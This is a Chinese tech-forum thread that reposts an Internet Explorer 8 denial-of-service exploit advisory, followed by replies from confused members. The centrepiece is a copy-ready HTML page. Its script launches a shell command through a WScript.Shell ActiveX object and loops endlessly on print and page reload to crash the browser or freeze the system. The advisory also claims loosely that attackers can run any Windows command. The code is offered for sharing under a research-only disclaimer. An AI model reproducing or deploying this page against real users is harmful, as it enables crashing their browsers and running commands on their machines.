设为首页 收藏本站

QQ登录

只需一步,快速开始

切换到宽版 切换风格

电脑疯子技术论坛|电脑极客社区

电脑疯子技术论坛|电脑极客社区»技术论坛 电脑疯子|系统推荐 VIP会员专区 帖子
微信扫一扫 分享朋友圈

已有 1119 人浏览分享

新年,好东西大家分享。刚刚拿到的。同时请IE8用户注意。

   关闭 [复制链接]
1119 5
本帖最后由 bek 于 2010-2-16 02:46 编辑

  2. =======================================================================

  4.                       Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit =======================================================================

  6. # code by Asheesh kumar Mani Tripathi

  8. # email informationhacker08@gmail.com

  10. # company       aksitservices

  12. # Credit by Asheesh Anaconda


  15. #Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
  16. #Greets to Bhudeo Prasad for making shell script :)


  19. #Background

  21. Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)

  23. #Vulnerability
  24. This bug is a typical result of multitudinous  loop.
  25. The flaw exists within "history go" ActiveX control which contains
  26. stack based overflow conditions.User interaction is required to
  27. exploit this vulnerability in that the target must visit a malicious
  28. web page.


  31. #Impact

  33. Attacker Can run any windows command ,consume lots of memory and able to crash your IE or make
  34. your system unaccessible,your work if any   might be lost

  36. #Proof of concept
  37. copy the code in text file and save as "asheesh.html" open in Internet Explorer 8

  39. ========================================================================================================================

  41.                                                            asheesh.html
  42. ========================================================================================================================
  43. <html>
  44. <title>asheesh kumar mani tripathi</title>

  46. <head>
  47. <script type="text/javascript">
  48. function sucks()
  49. {

  51. var shell=new ActiveXObject("WScript.Shell");
  52. shell.Run("ipconfig", 1);

  54. }

  56. function asheesh()
  57. {
  58. sucks();
  59. window.onerror=new Function("history.go(0)");
  60. window.print();
  61. asheesh();


  64. }
  65. asheesh();
  66. </script>
  67. </head>
  68. <body onLoad="asheesh()"></body>

  70. </html>


  73. ========================================================================================================================




  78. #刚刚拿到的。和大家分享。(方法)可能带有攻击性,仅供安全研究之用,风险自负!
复制代码

分享, 新年, 用户

相关帖子

举报

回复

评论 5

l6688 l6688  正式会员  发表于 2010-3-23 16:48:33 | 显示全部楼层
什么东西哦?????

看不明白

举报

回复 支持 反对
souona souona  VIP荣誉会员  发表于 2010-4-12 11:35:56 | 显示全部楼层
好东西。。。厉害厉害

举报

回复 支持 反对
孤叶飘翎 孤叶飘翎  初级会员  发表于 2010-5-14 14:04:09 | 显示全部楼层
一头雾水。不明白。

举报

回复 支持 反对
good_0006 good_0006  合格会员  发表于 2010-6-21 12:46:04 | 显示全部楼层
不懂,请高人批讲!{:3_237:}

举报

回复 支持 反对
ektha4683 ektha4683  VIP荣誉会员  发表于 2011-6-24 21:25:24 | 显示全部楼层
LZ是否应当给我们解释一下 看不明白

举报

回复 支持 反对
返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

bek
管理员

1

关注

23

粉丝

2901

主题
精彩推荐
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子技术论坛GHOST WIN10X86 快速装机版201909
电脑疯子技术论坛GHOST WIN10X86 快速装机
电脑疯子GHOST WIN10X64 快速装机版201812
电脑疯子GHOST WIN10X64 快速装机版201812
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.